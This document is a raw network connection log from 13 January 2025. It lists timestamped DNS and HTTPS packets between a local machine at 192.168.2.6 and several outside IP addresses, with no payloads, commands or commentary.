Jan 13, 2025 01:49:13.799763918 CET	443	49743	142.250.186.164	192.168.2.6
Jan 13, 2025 01:49:13.846648932 CET	49743	443	192.168.2.6	142.250.186.164
Jan 13, 2025 01:49:13.949048996 CET	58528	53	192.168.2.6	1.1.1.1
Jan 13, 2025 01:49:13.953900099 CET	53	58528	1.1.1.1	192.168.2.6
Jan 13, 2025 01:49:13.954035044 CET	58528	53	192.168.2.6	1.1.1.1
Jan 13, 2025 01:49:13.954051971 CET	58528	53	192.168.2.6	1.1.1.1
Jan 13, 2025 01:49:13.958930016 CET	53	58528	1.1.1.1	192.168.2.6
Jan 13, 2025 01:49:14.397350073 CET	53	58528	1.1.1.1	192.168.2.6
Jan 13, 2025 01:49:14.402440071 CET	58528	53	192.168.2.6	1.1.1.1
Jan 13, 2025 01:49:14.407504082 CET	53	58528	1.1.1.1	192.168.2.6
Jan 13, 2025 01:49:14.407557964 CET	58528	53	192.168.2.6	1.1.1.1
Jan 13, 2025 01:49:19.267688036 CET	53483	53	192.168.2.6	1.1.1.1
Jan 13, 2025 01:49:19.272545099 CET	53	53483	1.1.1.1	192.168.2.6
Jan 13, 2025 01:49:19.272613049 CET	53483	53	192.168.2.6	1.1.1.1
Jan 13, 2025 01:49:19.272640944 CET	53483	53	192.168.2.6	1.1.1.1
Jan 13, 2025 01:49:19.277465105 CET	53	53483	1.1.1.1	192.168.2.6
Jan 13, 2025 01:49:19.770118952 CET	53	53483	1.1.1.1	192.168.2.6
Jan 13, 2025 01:49:19.770744085 CET	53483	53	192.168.2.6	1.1.1.1
Jan 13, 2025 01:49:19.775820971 CET	53	53483	1.1.1.1	192.168.2.6
Jan 13, 2025 01:49:19.776057005 CET	53483	53	192.168.2.6	1.1.1.1
Jan 13, 2025 01:49:21.101375103 CET	53495	443	192.168.2.6	89.250.71.221
Jan 13, 2025 01:49:21.101424932 CET	443	53495	89.250.71.221	192.168.2.6
Jan 13, 2025 01:49:21.101480961 CET	53495	443	192.168.2.6	89.250.71.221
Jan 13, 2025 01:49:21.102410078 CET	53495	443	192.168.2.6	89.250.71.221
Jan 13, 2025 01:49:21.102423906 CET	443	53495	89.250.71.221	192.168.2.6
Jan 13, 2025 01:49:21.103513956 CET	53496	443	192.168.2.6	89.250.71.221
Jan 13, 2025 01:49:21.103563070 CET	443	53496	89.250.71.221	192.168.2.6
Jan 13, 2025 01:49:21.103620052 CET	53496	443	192.168.2.6	89.250.71.221
Jan 13, 2025 01:49:21.104165077 CET	53496	443	192.168.2.6	89.250.71.221
Jan 13, 2025 01:49:21.104182005 CET	443	53496	89.250.71.221	192.168.2.6
Jan 13, 2025 01:49:23.668735027 CET	443	49743	142.250.186.164	192.168.2.6
Jan 13, 2025 01:49:23.668812990 CET	443	49743	142.250.186.164	192.168.2.6
Jan 13, 2025 01:49:23.669223070 CET	49743	443	192.168.2.6	142.250.186.164
Jan 13, 2025 01:49:23.776386976 CET	53512	443	192.168.2.6	40.115.3.253
Jan 13, 2025 01:49:23.776417017 CET	443	53512	40.115.3.253	192.168.2.6
Jan 13, 2025 01:49:23.776751041 CET	53512	443	192.168.2.6	40.115.3.253
Jan 13, 2025 01:49:23.777671099 CET	53512	443	192.168.2.6	40.115.3.253
Jan 13, 2025 01:49:23.777681112 CET	443	53512	40.115.3.253	192.168.2.6
Jan 13, 2025 01:49:24.607634068 CET	443	53512	40.115.3.253	192.168.2.6
Jan 13, 2025 01:49:24.607731104 CET	53512	443	192.168.2.6	40.115.3.253
Jan 13, 2025 01:49:24.640250921 CET	53512	443	192.168.2.6	40.115.3.253
Jan 13, 2025 01:49:24.640278101 CET	443	53512	40.115.3.253	192.168.2.6
Jan 13, 2025 01:49:24.640686035 CET	443	53512	40.115.3.253	192.168.2.6
Jan 13, 2025 01:49:24.667351961 CET	53512	443	192.168.2.6	40.115.3.253
Jan 13, 2025 01:49:24.670501947 CET	53512	443	192.168.2.6	40.115.3.253
Jan 13, 2025 01:49:24.670510054 CET	443	53512	40.115.3.253	192.168.2.6
Jan 13, 2025 01:49:24.670830965 CET	53512	443	192.168.2.6	40.115.3.253
Jan 13, 2025 01:49:24.715326071 CET	443	53512	40.115.3.253	192.168.2.6
Jan 13, 2025 01:49:24.846026897 CET	443	53512	40.115.3.253	192.168.2.6
Jan 13, 2025 01:49:24.846184015 CET	443	53512	40.115.3.253	192.168.2.6
Jan 13, 2025 01:49:24.846251011 CET	53512	443	192.168.2.6	40.115.3.253
Jan 13, 2025 01:49:24.846441031 CET	53512	443	192.168.2.6	40.115.3.253
Jan 13, 2025 01:49:24.846460104 CET	443	53512	40.115.3.253	192.168.2.6
Jan 13, 2025 01:49:25.357613087 CET	49743	443	192.168.2.6	142.250.186.164
Jan 13, 2025 01:49:25.357635021 CET	443	49743	142.250.186.164	192.168.2.6
Jan 13, 2025 01:49:26.302515030 CET	443	53495	89.250.71.221	192.168.2.6
Jan 13, 2025 01:49:26.306947947 CET	53495	443	192.168.2.6	89.250.71.221
Jan 13, 2025 01:49:26.306967974 CET	443	53495	89.250.71.221	192.168.2.6
Jan 13, 2025 01:49:26.308103085 CET	443	53495	89.250.71.221	192.168.2.6
Jan 13, 2025 01:49:26.308259010 CET	53495	443	192.168.2.6	89.250.71.221
Jan 13, 2025 01:49:26.354556084 CET	53495	443	192.168.2.6	89.250.71.221
Jan 13, 2025 01:49:26.354794025 CET	443	53495	89.250.71.221	192.168.2.6
Jan 13, 2025 01:49:26.354834080 CET	53495	443	192.168.2.6	89.250.71.221
Jan 13, 2025 01:49:26.357609034 CET	443	53496	89.250.71.221	192.168.2.6
Jan 13, 2025 01:49:26.363018036 CET	53496	443	192.168.2.6	89.250.71.221
Jan 13, 2025 01:49:26.363082886 CET	443	53496	89.250.71.221	192.168.2.6
Jan 13, 2025 01:49:26.364593029 CET	443	53496	89.250.71.221	192.168.2.6
Jan 13, 2025 01:49:26.364850998 CET	53496	443	192.168.2.6	89.250.71.221
Jan 13, 2025 01:49:26.365461111 CET	53496	443	192.168.2.6	89.250.71.221
Jan 13, 2025 01:49:26.365585089 CET	443	53496	89.250.71.221	192.168.2.6
Jan 13, 2025 01:49:26.394829988 CET	53495	443	192.168.2.6	89.250.71.221
Jan 13, 2025 01:49:26.394880056 CET	443	53495	89.250.71.221	192.168.2.6
Jan 13, 2025 01:49:26.410808086 CET	53496	443	192.168.2.6	89.250.71.221
Jan 13, 2025 01:49:26.410840034 CET	443	53496	89.250.71.221	192.168.2.6
Jan 13, 2025 01:49:26.442933083 CET	53495	443	192.168.2.6	89.250.71.221
Jan 13, 2025 01:49:26.458503008 CET	53496	443	192.168.2.6	89.250.71.221
Jan 13, 2025 01:49:32.092832088 CET	443	53495	89.250.71.221	192.168.2.6
Jan 13, 2025 01:49:32.092869043 CET	443	53495	89.250.71.221	192.168.2.6
Jan 13, 2025 01:49:32.092875004 CET	443	53495	89.250.71.221	192.168.2.6
Jan 13, 2025 01:49:32.092895031 CET	443	53495	89.250.71.221	192.168.2.6
Jan 13, 2025 01:49:32.092947960 CET	53495	443	192.168.2.6	89.250.71.221
Jan 13, 2025 01:49:32.092978001 CET	443	53495	89.250.71.221	192.168.2.6
Jan 13, 2025 01:49:32.139991999 CET	53495	443	192.168.2.6	89.250.71.221
Jan 13, 2025 01:49:32.153065920 CET	53496	443	192.168.2.6	89.250.71.221
Jan 13, 2025 01:49:32.153887033 CET	53565	443	192.168.2.6	89.250.71.221
Jan 13, 2025 01:49:32.153924942 CET	443	53565	89.250.71.221	192.168.2.6
Jan 13, 2025 01:49:32.154604912 CET	53565	443	192.168.2.6	89.250.71.221
Jan 13, 2025 01:49:32.155396938 CET	53565	443	192.168.2.6	89.250.71.221
Jan 13, 2025 01:49:32.155406952 CET	443	53565	89.250.71.221	192.168.2.6
Jan 13, 2025 01:49:32.161022902 CET	53566	443	192.168.2.6	89.250.71.221
Jan 13, 2025 01:49:32.161061049 CET	443	53566	89.250.71.221	192.168.2.6
Jan 13, 2025 01:49:32.161123991 CET	53566	443	192.168.2.6	89.250.71.221
Jan 13, 2025 01:49:32.161406040 CET	53566	443	192.168.2.6	89.250.71.221
Jan 13, 2025 01:49:32.161418915 CET	443	53566	89.250.71.221	192.168.2.6
Jan 13, 2025 01:49:32.161864042 CET	53567	443	192.168.2.6	89.250.71.221
Jan 13, 2025 01:49:32.161875010 CET	443	53567	89.250.71.221	192.168.2.6
Jan 13, 2025 01:49:32.161978006 CET	53567	443	192.168.2.6	89.250.71.221
Jan 13, 2025 01:49:32.162189007 CET	53567	443	192.168.2.6	89.250.71.221
Jan 13, 2025 01:49:32.162194967 CET	443	53567	89.250.71.221	192.168.2.6
Jan 13, 2025 01:49:32.162796021 CET	53568	443	192.168.2.6	89.250.71.221
Jan 13, 2025 01:49:32.162802935 CET	443	53568	89.250.71.221	192.168.2.6
Jan 13, 2025 01:49:32.162856102 CET	53568	443	192.168.2.6	89.250.71.221
Jan 13, 2025 01:49:32.163845062 CET	53568	443	192.168.2.6	89.250.71.221
Jan 13, 2025 01:49:32.163853884 CET	443	53568	89.250.71.221	192.168.2.6
Jan 13, 2025 01:49:32.167865992 CET	53570	443	192.168.2.6	151.101.2.137
Jan 13, 2025 01:49:32.167891026 CET	443	53570	151.101.2.137	192.168.2.6
Jan 13, 2025 01:49:32.168029070 CET	53570	443	192.168.2.6	151.101.2.137
Jan 13, 2025 01:49:32.168314934 CET	53570	443	192.168.2.6	151.101.2.137
Jan 13, 2025 01:49:32.168323994 CET	443	53570	151.101.2.137	192.168.2.6
Jan 13, 2025 01:49:32.177691936 CET	443	53495	89.250.71.221	192.168.2.6
Jan 13, 2025 01:49:32.177701950 CET	443	53495	89.250.71.221	192.168.2.6
Jan 13, 2025 01:49:32.177737951 CET	443	53495	89.250.71.221	192.168.2.6
Jan 13, 2025 01:49:32.177767038 CET	53495	443	192.168.2.6	89.250.71.221
Jan 13, 2025 01:49:32.177824020 CET	53495	443	192.168.2.6	89.250.71.221
Jan 13, 2025 01:49:32.178483963 CET	443	53495	89.250.71.221	192.168.2.6
Jan 13, 2025 01:49:32.178492069 CET	443	53495	89.250.71.221	192.168.2.6
Jan 13, 2025 01:49:32.178565025 CET	443	53495	89.250.71.221	192.168.2.6
Jan 13, 2025 01:49:32.178592920 CET	53495	443	192.168.2.6	89.250.71.221
Jan 13, 2025 01:49:32.178633928 CET	53495	443	192.168.2.6	89.250.71.221
Jan 13, 2025 01:49:32.179573059 CET	443	53495	89.250.71.221	192.168.2.6
Jan 13, 2025 01:49:32.179579020 CET	443	53495	89.250.71.221	192.168.2.6
Jan 13, 2025 01:49:32.179639101 CET	53495	443	192.168.2.6	89.250.71.221
Jan 13, 2025 01:49:32.179646969 CET	443	53495	89.250.71.221	192.168.2.6
Jan 13, 2025 01:49:32.180756092 CET	443	53495	89.250.71.221	192.168.2.6
Jan 13, 2025 01:49:32.180821896 CET	53495	443	192.168.2.6	89.250.71.221
Jan 13, 2025 01:49:32.180829048 CET	443	53495	89.250.71.221	192.168.2.6
Jan 13, 2025 01:49:32.180835962 CET	443	53495	89.250.71.221	192.168.2.6
Jan 13, 2025 01:49:32.180872917 CET	53495	443	192.168.2.6	89.250.71.221
Jan 13, 2025 01:49:32.195380926 CET	443	53496	89.250.71.221	192.168.2.6
Jan 13, 2025 01:49:32.271389961 CET	443	53495	89.250.71.221	192.168.2.6
Jan 13, 2025 01:49:32.271492958 CET	53495	443	192.168.2.6	89.250.71.221
Jan 13, 2025 01:49:32.271537066 CET	443	53495	89.250.71.221	192.168.2.6
Jan 13, 2025 01:49:32.271615028 CET	53495	443	192.168.2.6	89.250.71.221
Jan 13, 2025 01:49:32.278383970 CET	443	53495	89.250.71.221	192.168.2.6
Jan 13, 2025 01:49:32.278565884 CET	443	53495	89.250.71.221	192.168.2.6
Jan 13, 2025 01:49:32.278630972 CET	53495	443	192.168.2.6	89.250.71.221
Jan 13, 2025 01:49:32.280364037 CET	53495	443	192.168.2.6	89.250.71.221
Jan 13, 2025 01:49:32.280378103 CET	443	53495	89.250.71.221	192.168.2.6
Jan 13, 2025 01:49:32.280731916 CET	53572	443	192.168.2.6	89.250.71.221
Jan 13, 2025 01:49:32.280822039 CET	443	53572	89.250.71.221	192.168.2.6
Jan 13, 2025 01:49:32.280982018 CET	53572	443	192.168.2.6	89.250.71.221
Jan 13, 2025 01:49:32.283308983 CET	53572	443	192.168.2.6	89.250.71.221
Jan 13, 2025 01:49:32.283341885 CET	443	53572	89.250.71.221	192.168.2.6
Jan 13, 2025 01:49:32.623203039 CET	443	53570	151.101.2.137	192.168.2.6
Jan 13, 2025 01:49:32.623507977 CET	53570	443	192.168.2.6	151.101.2.137
Jan 13, 2025 01:49:32.623539925 CET	443	53570	151.101.2.137	192.168.2.6
Jan 13, 2025 01:49:32.624535084 CET	443	53570	151.101.2.137	192.168.2.6
Jan 13, 2025 01:49:32.624598980 CET	53570	443	192.168.2.6	151.101.2.137
Jan 13, 2025 01:49:32.811362028 CET	53570	443	192.168.2.6	151.101.2.137
Jan 13, 2025 01:49:32.811525106 CET	53570	443	192.168.2.6	151.101.2.137
Jan 13, 2025 01:49:32.811767101 CET	443	53570	151.101.2.137	192.168.2.6
Jan 13, 2025 01:49:32.865171909 CET	53570	443	192.168.2.6	151.101.2.137
Jan 13, 2025 01:49:32.865219116 CET	443	53570	151.101.2.137	192.168.2.6
Jan 13, 2025 01:49:32.908637047 CET	443	53570	151.101.2.137	192.168.2.6
Jan 13, 2025 01:49:32.908677101 CET	443	53570	151.101.2.137	192.168.2.6
Jan 13, 2025 01:49:32.908713102 CET	443	53570	151.101.2.137	192.168.2.6
Jan 13, 2025 01:49:32.908719063 CET	53570	443	192.168.2.6	151.101.2.137
Jan 13, 2025 01:49:32.908742905 CET	443	53570	151.101.2.137	192.168.2.6
Jan 13, 2025 01:49:32.908796072 CET	443	53570	151.101.2.137	192.168.2.6
Jan 13, 2025 01:49:32.908844948 CET	53570	443	192.168.2.6	151.101.2.137
Jan 13, 2025 01:49:32.908845901 CET	53570	443	192.168.2.6	151.101.2.137
Jan 13, 2025 01:49:32.908855915 CET	443	53570	151.101.2.137	192.168.2.6
Jan 13, 2025 01:49:32.908866882 CET	443	53570	151.101.2.137	192.168.2.6
Jan 13, 2025 01:49:32.908921003 CET	53570	443	192.168.2.6	151.101.2.137
Jan 13, 2025 01:49:32.908926964 CET	443	53570	151.101.2.137	192.168.2.6
Jan 13, 2025 01:49:32.908935070 CET	443	53570	151.101.2.137	192.168.2.6
Jan 13, 2025 01:49:32.908977032 CET	53570	443	192.168.2.6	151.101.2.137
Jan 13, 2025 01:49:32.908993959 CET	443	53570	151.101.2.137	192.168.2.6
Jan 13, 2025 01:49:32.909692049 CET	443	53570	151.101.2.137	192.168.2.6
Jan 13, 2025 01:49:32.909745932 CET	53570	443	192.168.2.6	151.101.2.137
Jan 13, 2025 01:49:32.909763098 CET	443	53570	151.101.2.137	192.168.2.6
Jan 13, 2025 01:49:32.961440086 CET	53570	443	192.168.2.6	151.101.2.137
Jan 13, 2025 01:49:32.961463928 CET	443	53570	151.101.2.137	192.168.2.6
Jan 13, 2025 01:49:32.995328903 CET	443	53570	151.101.2.137	192.168.2.6
Jan 13, 2025 01:49:32.995368958 CET	443	53570	151.101.2.137	192.168.2.6
Jan 13, 2025 01:49:32.995403051 CET	443	53570	151.101.2.137	192.168.2.6
Jan 13, 2025 01:49:32.995434046 CET	443	53570	151.101.2.137	192.168.2.6
Jan 13, 2025 01:49:32.995450974 CET	53570	443	192.168.2.6	151.101.2.137
Jan 13, 2025 01:49:32.995481014 CET	443	53570	151.101.2.137	192.168.2.6
Jan 13, 2025 01:49:32.995510101 CET	53570	443	192.168.2.6	151.101.2.137
Jan 13, 2025 01:49:32.995534897 CET	53570	443	192.168.2.6	151.101.2.137
Jan 13, 2025 01:49:32.995548964 CET	443	53570	151.101.2.137	192.168.2.6
Jan 13, 2025 01:49:32.995666027 CET	443	53570	151.101.2.137	192.168.2.6
Jan 13, 2025 01:49:32.995709896 CET	53570	443	192.168.2.6	151.101.2.137
Jan 13, 2025 01:49:32.995723009 CET	443	53570	151.101.2.137	192.168.2.6
Jan 13, 2025 01:49:32.995805025 CET	443	53570	151.101.2.137	192.168.2.6
Jan 13, 2025 01:49:32.995855093 CET	53570	443	192.168.2.6	151.101.2.137
Jan 13, 2025 01:49:32.995867014 CET	443	53570	151.101.2.137	192.168.2.6
Jan 13, 2025 01:49:32.996309996 CET	443	53570	151.101.2.137	192.168.2.6
Jan 13, 2025 01:49:32.996366978 CET	53570	443	192.168.2.6	151.101.2.137
Jan 13, 2025 01:49:32.996381044 CET	443	53570	151.101.2.137	192.168.2.6
Jan 13, 2025 01:49:32.996483088 CET	443	53570	151.101.2.137	192.168.2.6
Jan 13, 2025 01:49:32.996514082 CET	443	53570	151.101.2.137	192.168.2.6
Jan 13, 2025 01:49:32.996524096 CET	53570	443	192.168.2.6	151.101.2.137
Jan 13, 2025 01:49:32.996536970 CET	443	53570	151.101.2.137	192.168.2.6
Jan 13, 2025 01:49:32.996588945 CET	53570	443	192.168.2.6	151.101.2.137
Jan 13, 2025 01:49:32.997272968 CET	443	53570	151.101.2.137	192.168.2.6
Jan 13, 2025 01:49:32.997323990 CET	443	53570	151.101.2.137	192.168.2.6
Jan 13, 2025 01:49:32.997370958 CET	53570	443	192.168.2.6	151.101.2.137
Jan 13, 2025 01:49:32.997383118 CET	443	53570	151.101.2.137	192.168.2.6
Jan 13, 2025 01:49:32.997426987 CET	443	53570	151.101.2.137	192.168.2.6
Jan 13, 2025 01:49:32.997471094 CET	53570	443	192.168.2.6	151.101.2.137
Jan 13, 2025 01:49:32.997482061 CET	443	53570	151.101.2.137	192.168.2.6
Jan 13, 2025 01:49:32.998116016 CET	443	53570	151.101.2.137	192.168.2.6
Jan 13, 2025 01:49:32.998147011 CET	443	53570	151.101.2.137	192.168.2.6
Jan 13, 2025 01:49:32.998166084 CET	53570	443	192.168.2.6	151.101.2.137
Jan 13, 2025 01:49:32.998178959 CET	443	53570	151.101.2.137	192.168.2.6
Jan 13, 2025 01:49:32.998230934 CET	53570	443	192.168.2.6	151.101.2.137
Jan 13, 2025 01:49:32.998243093 CET	443	53570	151.101.2.137	192.168.2.6
Jan 13, 2025 01:49:33.038151979 CET	53570	443	192.168.2.6	151.101.2.137
Jan 13, 2025 01:49:33.047595978 CET	443	53496	89.250.71.221	192.168.2.6
Jan 13, 2025 01:49:33.047621012 CET	443	53496	89.250.71.221	192.168.2.6
Jan 13, 2025 01:49:33.047627926 CET	443	53496	89.250.71.221	192.168.2.6
Jan 13, 2025 01:49:33.047662973 CET	443	53496	89.250.71.221	192.168.2.6
Jan 13, 2025 01:49:33.047708035 CET	53496	443	192.168.2.6	89.250.71.221
Jan 13, 2025 01:49:33.047728062 CET	443	53496	89.250.71.221	192.168.2.6
Jan 13, 2025 01:49:33.047740936 CET	443	53496	89.250.71.221	192.168.2.6
Jan 13, 2025 01:49:33.047759056 CET	53496	443	192.168.2.6	89.250.71.221
Jan 13, 2025 01:49:33.047779083 CET	53496	443	192.168.2.6	89.250.71.221
Jan 13, 2025 01:49:33.050281048 CET	443	53570	151.101.2.137	192.168.2.6
Jan 13, 2025 01:49:33.082129002 CET	443	53570	151.101.2.137	192.168.2.6
Jan 13, 2025 01:49:33.082171917 CET	443	53570	151.101.2.137	192.168.2.6
Jan 13, 2025 01:49:33.082209110 CET	53570	443	192.168.2.6	151.101.2.137
Jan 13, 2025 01:49:33.082220078 CET	443	53570	151.101.2.137	192.168.2.6
Jan 13, 2025 01:49:33.082282066 CET	443	53570	151.101.2.137	192.168.2.6
Jan 13, 2025 01:49:33.082318068 CET	53570	443	192.168.2.6	151.101.2.137
Jan 13, 2025 01:49:33.082344055 CET	443	53570	151.101.2.137	192.168.2.6
Jan 13, 2025 01:49:33.082375050 CET	443	53570	151.101.2.137	192.168.2.6
Jan 13, 2025 01:49:33.082386017 CET	53570	443	192.168.2.6	151.101.2.137
Jan 13, 2025 01:49:33.082400084 CET	443	53570	151.101.2.137	192.168.2.6
Jan 13, 2025 01:49:33.082475901 CET	53570	443	192.168.2.6	151.101.2.137
Jan 13, 2025 01:49:33.082535982 CET	443	53570	151.101.2.137	192.168.2.6
Jan 13, 2025 01:49:33.082604885 CET	443	53570	151.101.2.137	192.168.2.6
Jan 13, 2025 01:49:33.082633018 CET	443	53570	151.101.2.137	192.168.2.6
Jan 13, 2025 01:49:33.082665920 CET	53570	443	192.168.2.6	151.101.2.137
Jan 13, 2025 01:49:33.082679987 CET	443	53570	151.101.2.137	192.168.2.6
Jan 13, 2025 01:49:33.082730055 CET	53570	443	192.168.2.6	151.101.2.137
Jan 13, 2025 01:49:33.083528042 CET	443	53570	151.101.2.137	192.168.2.6
Jan 13, 2025 01:49:33.083534956 CET	443	53570	151.101.2.137	192.168.2.6
Jan 13, 2025 01:49:33.083585024 CET	53570	443	192.168.2.6	151.101.2.137
Jan 13, 2025 01:49:33.083589077 CET	443	53570	151.101.2.137	192.168.2.6
Jan 13, 2025 01:49:33.083643913 CET	443	53570	151.101.2.137	192.168.2.6
Jan 13, 2025 01:49:33.083669901 CET	53570	443	192.168.2.6	151.101.2.137
Jan 13, 2025 01:49:33.083669901 CET	53570	443	192.168.2.6	151.101.2.137
Jan 13, 2025 01:49:33.083690882 CET	443	53570	151.101.2.137	192.168.2.6
Jan 13, 2025 01:49:33.083717108 CET	53570	443	192.168.2.6	151.101.2.137
Jan 13, 2025 01:49:33.085257053 CET	443	53570	151.101.2.137	192.168.2.6
Jan 13, 2025 01:49:33.085273981 CET	443	53570	151.101.2.137	192.168.2.6
Jan 13, 2025 01:49:33.085328102 CET	53570	443	192.168.2.6	151.101.2.137
Jan 13, 2025 01:49:33.085342884 CET	443	53570	151.101.2.137	192.168.2.6
Jan 13, 2025 01:49:33.085371017 CET	53570	443	192.168.2.6	151.101.2.137
Jan 13, 2025 01:49:33.126271009 CET	443	53570	151.101.2.137	192.168.2.6
Jan 13, 2025 01:49:33.126286030 CET	443	53570	151.101.2.137	192.168.2.6
Jan 13, 2025 01:49:33.126368046 CET	53570	443	192.168.2.6	151.101.2.137
Jan 13, 2025 01:49:33.126379967 CET	443	53570	151.101.2.137	192.168.2.6
Jan 13, 2025 01:49:33.168322086 CET	53570	443	192.168.2.6	151.101.2.137
Jan 13, 2025 01:49:33.169333935 CET	443	53570	151.101.2.137	192.168.2.6
Jan 13, 2025 01:49:33.169342041 CET	443	53570	151.101.2.137	192.168.2.6
Jan 13, 2025 01:49:33.169401884 CET	443	53570	151.101.2.137	192.168.2.6
Jan 13, 2025 01:49:33.169441938 CET	53570	443	192.168.2.6	151.101.2.137
Jan 13, 2025 01:49:33.169452906 CET	443	53570	151.101.2.137	192.168.2.6
Jan 13, 2025 01:49:33.169481039 CET	443	53570	151.101.2.137	192.168.2.6
Jan 13, 2025 01:49:33.169536114 CET	53570	443	192.168.2.6	151.101.2.137
Jan 13, 2025 01:49:33.169536114 CET	53570	443	192.168.2.6	151.101.2.137
Jan 13, 2025 01:49:33.170294046 CET	443	53570	151.101.2.137	192.168.2.6
Jan 13, 2025 01:49:33.170309067 CET	443	53570	151.101.2.137	192.168.2.6
Jan 13, 2025 01:49:33.170361042 CET	53570	443	192.168.2.6	151.101.2.137
Jan 13, 2025 01:49:33.170376062 CET	443	53570	151.101.2.137	192.168.2.6
Jan 13, 2025 01:49:33.170422077 CET	53570	443	192.168.2.6	151.101.2.137
Jan 13, 2025 01:49:33.171091080 CET	443	53570	151.101.2.137	192.168.2.6
Jan 13, 2025 01:49:33.171106100 CET	443	53570	151.101.2.137	192.168.2.6
Jan 13, 2025 01:49:33.171153069 CET	53570	443	192.168.2.6	151.101.2.137
Jan 13, 2025 01:49:33.171165943 CET	443	53570	151.101.2.137	192.168.2.6
Jan 13, 2025 01:49:33.171191931 CET	53570	443	192.168.2.6	151.101.2.137
Jan 13, 2025 01:49:33.171211004 CET	53570	443	192.168.2.6	151.101.2.137
Jan 13, 2025 01:49:33.172071934 CET	443	53570	151.101.2.137	192.168.2.6
Jan 13, 2025 01:49:33.172087908 CET	443	53570	151.101.2.137	192.168.2.6
Jan 13, 2025 01:49:33.172138929 CET	53570	443	192.168.2.6	151.101.2.137
Jan 13, 2025 01:49:33.172153950 CET	443	53570	151.101.2.137	192.168.2.6
Jan 13, 2025 01:49:33.172200918 CET	53570	443	192.168.2.6	151.101.2.137
Jan 13, 2025 01:49:33.172696114 CET	443	53570	151.101.2.137	192.168.2.6
Jan 13, 2025 01:49:33.172712088 CET	443	53570	151.101.2.137	192.168.2.6
Jan 13, 2025 01:49:33.172761917 CET	53570	443	192.168.2.6	151.101.2.137
Jan 13, 2025 01:49:33.172772884 CET	443	53570	151.101.2.137	192.168.2.6
Jan 13, 2025 01:49:33.172818899 CET	53570	443	192.168.2.6	151.101.2.137
Jan 13, 2025 01:49:33.172818899 CET	53570	443	192.168.2.6	151.101.2.137
Jan 13, 2025 01:49:33.173485041 CET	443	53570	151.101.2.137	192.168.2.6
Jan 13, 2025 01:49:33.173501015 CET	443	53570	151.101.2.137	192.168.2.6
Jan 13, 2025 01:49:33.173551083 CET	53570	443	192.168.2.6	151.101.2.137
Jan 13, 2025 01:49:33.173563004 CET	443	53570	151.101.2.137	192.168.2.6
Jan 13, 2025 01:49:33.173587084 CET	53570	443	192.168.2.6	151.101.2.137
Jan 13, 2025 01:49:33.173605919 CET	53570	443	192.168.2.6	151.101.2.137
Jan 13, 2025 01:49:33.225083113 CET	443	53570	151.101.2.137	192.168.2.6
Jan 13, 2025 01:49:33.225099087 CET	443	53570	151.101.2.137	192.168.2.6
Jan 13, 2025 01:49:33.225178957 CET	53570	443	192.168.2.6	151.101.2.137
Jan 13, 2025 01:49:33.225198030 CET	443	53570	151.101.2.137	192.168.2.6
Jan 13, 2025 01:49:33.225229979 CET	53570	443	192.168.2.6	151.101.2.137
Jan 13, 2025 01:49:33.225250006 CET	53570	443	192.168.2.6	151.101.2.137
Jan 13, 2025 01:49:33.256279945 CET	443	53570	151.101.2.137	192.168.2.6
Jan 13, 2025 01:49:33.256305933 CET	443	53570	151.101.2.137	192.168.2.6
Jan 13, 2025 01:49:33.256360054 CET	53570	443	192.168.2.6	151.101.2.137
Jan 13, 2025 01:49:33.256386995 CET	443	53570	151.101.2.137	192.168.2.6
Jan 13, 2025 01:49:33.256412983 CET	53570	443	192.168.2.6	151.101.2.137
Jan 13, 2025 01:49:33.256429911 CET	53570	443	192.168.2.6	151.101.2.137
Jan 13, 2025 01:49:33.256778002 CET	443	53570	151.101.2.137	192.168.2.6
Jan 13, 2025 01:49:33.256839991 CET	443	53570	151.101.2.137	192.168.2.6
Jan 13, 2025 01:49:33.256844044 CET	53570	443	192.168.2.6	151.101.2.137
Jan 13, 2025 01:49:33.256872892 CET	443	53570	151.101.2.137	192.168.2.6
Jan 13, 2025 01:49:33.256884098 CET	443	53570	151.101.2.137	192.168.2.6
Jan 13, 2025 01:49:33.256907940 CET	53570	443	192.168.2.6	151.101.2.137
Jan 13, 2025 01:49:33.256932974 CET	53570	443	192.168.2.6	151.101.2.137
Jan 13, 2025 01:49:33.258090019 CET	53570	443	192.168.2.6	151.101.2.137
Jan 13, 2025 01:49:33.273416996 CET	53496	443	192.168.2.6	89.250.71.221
Jan 13, 2025 01:49:33.273477077 CET	443	53496	89.250.71.221	192.168.2.6
Jan 13, 2025 01:49:33.282555103 CET	53570	443	192.168.2.6	151.101.2.137
Jan 13, 2025 01:49:33.282587051 CET	443	53570	151.101.2.137	192.168.2.6
Jan 13, 2025 01:49:33.544543028 CET	53582	443	192.168.2.6	151.101.66.137
Jan 13, 2025 01:49:33.544603109 CET	443	53582	151.101.66.137	192.168.2.6
Jan 13, 2025 01:49:33.544668913 CET	53582	443	192.168.2.6	151.101.66.137
Jan 13, 2025 01:49:33.545274973 CET	53582	443	192.168.2.6	151.101.66.137
Jan 13, 2025 01:49:33.545308113 CET	443	53582	151.101.66.137	192.168.2.6
Jan 13, 2025 01:49:34.028070927 CET	443	53582	151.101.66.137	192.168.2.6
Jan 13, 2025 01:49:34.028562069 CET	53582	443	192.168.2.6	151.101.66.137
Jan 13, 2025 01:49:34.028628111 CET	443	53582	151.101.66.137	192.168.2.6
Jan 13, 2025 01:49:34.029695034 CET	443	53582	151.101.66.137	192.168.2.6
Jan 13, 2025 01:49:34.029778004 CET	53582	443	192.168.2.6	151.101.66.137
Jan 13, 2025 01:49:34.030433893 CET	53582	443	192.168.2.6	151.101.66.137
Jan 13, 2025 01:49:34.030520916 CET	443	53582	151.101.66.137	192.168.2.6
Jan 13, 2025 01:49:34.030719042 CET	53582	443	192.168.2.6	151.101.66.137
Jan 13, 2025 01:49:34.030735970 CET	443	53582	151.101.66.137	192.168.2.6
Jan 13, 2025 01:49:34.081476927 CET	53582	443	192.168.2.6	151.101.66.137
Jan 13, 2025 01:49:34.129486084 CET	443	53582	151.101.66.137	192.168.2.6
Jan 13, 2025 01:49:34.145425081 CET	443	53582	151.101.66.137	192.168.2.6
Jan 13, 2025 01:49:34.145440102 CET	443	53582	151.101.66.137	192.168.2.6
Jan 13, 2025 01:49:34.145453930 CET	443	53582	151.101.66.137	192.168.2.6
Jan 13, 2025 01:49:34.145509958 CET	53582	443	192.168.2.6	151.101.66.137
Jan 13, 2025 01:49:34.145561934 CET	443	53582	151.101.66.137	192.168.2.6
Jan 13, 2025 01:49:34.145593882 CET	53582	443	192.168.2.6	151.101.66.137
Jan 13, 2025 01:49:34.145642996 CET	53582	443	192.168.2.6	151.101.66.137
Jan 13, 2025 01:49:34.220349073 CET	443	53582	151.101.66.137	192.168.2.6
